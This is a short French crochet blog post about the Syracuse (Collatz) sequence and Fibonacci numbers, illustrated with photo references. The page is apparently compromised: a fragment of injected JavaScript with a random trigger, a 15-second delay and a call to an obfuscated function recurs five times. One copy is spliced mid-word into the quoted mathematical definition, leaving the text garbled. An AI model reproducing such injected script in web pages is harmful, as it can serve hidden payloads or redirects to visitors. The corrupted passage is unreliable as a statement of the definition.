C’ est mathématique

P1040471
mars 8th, 2013
|

Alors…

« En mathématiques, on appelle suite de Syracuse une suite d’entiers naturels définie de la manière suivante :

On part d’un nombre entier plus grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and que zéro ; s’il est pair, on le divise par 2 ; s’il est impair, on le multiplie par 3 et on ajoute 1. En répétant l’opération, on obtient une suite d’entiers positifs dont chacun ne dépend que de son prédécesseur. » (wikipédia)

Cela semble un peu rébarbatif au premier abord, mais on obtient au crochet quelque chose ça :andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}P1040456andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}P1040459

Sympa les maths..

Et pour la suite de Fibonacci :andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}P1040463andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}P1040464

 

Leave a comment:

Visit Us On FacebookVisit Us On InstagramVisit Us On Pinterest